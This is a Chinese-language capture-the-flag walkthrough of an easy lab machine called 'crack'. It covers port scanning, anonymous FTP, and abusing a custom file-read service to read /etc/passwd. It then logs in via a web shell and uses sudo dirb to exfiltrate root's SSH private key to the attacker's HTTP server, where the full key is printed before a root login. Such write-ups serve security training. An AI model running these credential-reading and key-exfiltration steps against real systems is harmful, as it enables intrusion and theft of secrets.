难度:easy

kali:192.168.56.104

靶机:192.168.56.165

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.165 -sV -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 21:24 CST
Nmap scan report for 192.168.56.165
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.105
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Apr 26 15:55 upload [NSE: writeable]
4200/tcp  open  ssl/http ShellInABox
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after:  2043-06-02T10:20:13
|_http-title: Shell In A Box
12359/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     File to read:NOFile to read:
|   NULL: 
|_    File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-rvice :
SF-Port12359-TCP:V=7.94SVN%I=7%D=4/27%Time=662CFCAC%P=x86_64-pc-linux-gnu%
SF:r(NULL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:N
SF:OFile\x20to\x20read:");
MAC Address: 08:00:27:0E:BE:24 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.56.165

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.42 seconds

开启了21 4200 12359 三个端口,先ftp匿名登录看一手

ftp匿名登录

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.165
Connected to 192.168.56.165.
220 (vsFTPd 3.0.3)
Name (192.168.56.165:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||10771|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 07  2023 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 upload
226 Directory send OK.

有个upload目录

ftp> cd upload
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||12802|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py
226 Directory send OK.

把py文件get下来看看

import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = "NO"
while True:
        try:
                c.send('File to read:'.encode())
                data = c.recv(1024)
                file = (str(data, 'utf-8').strip())
                filename = os.path.basename(file)
                check = "/srv/ftp/upload/"+filename
                if os.path.isfile(check) and os.path.isfile(file):
                        f = open(file,"r")
                        lines = f.readlines()
                        lines = str(lines)
                        lines = lines.encode()
                        c.send(lines)
                else:
                        c.send(no.encode())
        except ConnectionResetError:
                pass

发现12359端口可以读取文件,但是只能读取存在的ftp服务器上面的文件

┌──(root㉿kali2)-[~/Desktop]
└─# nc 192.168.56.165 12359       
File to read:crack.py
['import os\n', 'import socket\n', 's = socket.socket()\n', 's.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n', 'port = 12359\n', "s.bind(('', port))\n", 's.listen(50)\n', '\n', 'c, addr = s.accept()\n', 'no = "NO"\n', 'while True:\n', '        try:\n', "                c.send('File to read:'.encode())\n", '                data = c.recv(1024)\n', "                file = (str(data, 'utf-8').strip())\n", '                filename = os.path.basename(file)\n', '                check = "/srv/ftp/upload/"+filename\n', '                if os.path.isfile(check) and os.path.isfile(file):\n', '                        f = open(file,"r")\n', '                        lines = f.readlines()\n', '                        lines = str(lines)\n', '                        lines = lines.encode()\n', '                        c.send(lines)\n', '                else:\n', '                        c.send(no.encode())\n', '        except ConnectionResetError:\n', '                pass\n']File to read:

发现确实可以读取,为了读取passwd目录现在ftp上传一个passwd目录

ftp> ls -al
229 Entering Extended Passive Mode (|||49777|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 26 15:55 .
drwxr-xr-x    3 0        114          4096 Jun 07  2023 ..
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py
-rw-------    1 107      114             0 Apr 26 15:55 passwd
226 Directory send OK.
┌──(root㉿kali2)-[~/Desktop]
└─# nc 192.168.56.165 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']File to read:

getshell

注意到cris用户的shell是/bin/bash,进入4200端口登录一下,cirs/cris
OpEkMx.png

提权root

sudo

cris@crack:~$ sudo -l
Matching Defaults entries for cris on crack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cris may run the following commands on crack:
    (ALL) NOPASSWD: /usr/bin/dirb

dirb是目录扫描的工具,本地起个http服务,然后用root的ssh私钥文件作为密码来泄露私钥

cris@crack:~$ sudo /usr/bin/dirb  http://192.168.56.104:6677 /root/.ssh/id_rsa

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr 27 15:58:53 2024
URL_BASE: http://192.168.56.104:6677/
WORDLIST_FILES: /root/.ssh/id_rsa

-----------------

GENERATED WORDS: 38                                                            

---- Scanning URL: http://192.168.56.104:6677/ ----
                                                                                                                                                                                                           
-----------------
END_TIME: Sat Apr 27 15:58:53 2024
DOWNLOADED: 38 - FOUND: 0
┌──(root㉿kali2)-[~/Desktop]
└─# python -m http.server 6677
Serving HTTP on 0.0.0.0 port 6677 (http://0.0.0.0:6677/) ...
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /frand2 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /-----BEGIN HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /xNQ8NxRO4/bC1v90lUrhyLi/ML5B4nak+5vLFJi8NlwXMQJ/xCWZg5+WOLduFp4VvHlwAf HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /tDh2C+tJp2hqusW1jZRqSXspCfKLPt/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET //+FwJbMna8iPwmvK6n/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Kn2aZN/8xWAB+/t96TcXogtSbQw/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3/Cb34a/6v8c HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /9rMjGl9HMZFDwswzAGrvPOeroVB/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /EAAAGBAMQb0XtxB+u8vYyLdq8Gu/bbzw8Jm9lpmL/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /wtb/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP/hcCWzJ2vI HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /j8Jryup/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /b2FK7qDomlEWLqc7scNuUWqNEm/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf/MVg HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN/wm9+Gv+r/HPazIxpfRzGR HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa/ HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR/3uSMN HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /peiKDzLI/Y+QcQku/7GmUIV4ugP0fjMnz/XcXqe6GVNX/gvNeT6WfKPCzcaXiF4I2i228u HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf/yUyK04a6mhFg3kJzsxE+iDOVH28D HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /wQDlr9NWE6q1BovNNobebvw44NdBRQE/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /0MoSXZXiC/0/CSfe6Je7unnIzhiA85jSe/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /1ROwaN5uL26gIgtf/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /0sTQ3d/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET //RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /oxY6YRERurpcyYuSa/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /6xpD9lHWyp+ocD/meYC7V8aio/W9VxL25NlYwdFyCgecd/rIJQ+tGPXoqXIKrf5lVrVtFC HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= HTTP/1.1" 404 -
192.168.56.165 - - [27/Apr/2024 21:58:54] code 404, message File not found
192.168.56.165 - - [27/Apr/2024 21:58:54] "GET /-----END HTTP/1.1" 404 -

root的私钥泄露出来了,整理一下
—–BEGIN OPENSSH PRIVATE KEY—–
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
s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=
—–END OPENSSH PRIVATE KEY—–

传到靶机然后登录

cris@crack:~$ wget http://192.168.56.104:6677/ssh.txt
--2024-04-27 16:02:35--  http://192.168.56.104:6677/ssh.txt
Conectando con 192.168.56.104:6677... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2592 (2,5K) [text/plain]
Grabando a: «ssh.txt»

ssh.txt                                            100%[================================================================================================================>]   2,53K  --.-KB/s    en 0s      

2024-04-27 16:02:35 (444 MB/s) - «ssh.txt» guardado [2592/2592]

cris@crack:~$ chmod 600 ssh.txt
cris@crack:~$ ssh -i ssh.txt root@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:7z5F9pr6GN7gcEMbKUwipxWswKEpR9bMKOVzGc0V7/s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun  7 22:11:49 2023
root@crack:~# id
uid=0(root) gid=0(root) grupos=0(root)

成功root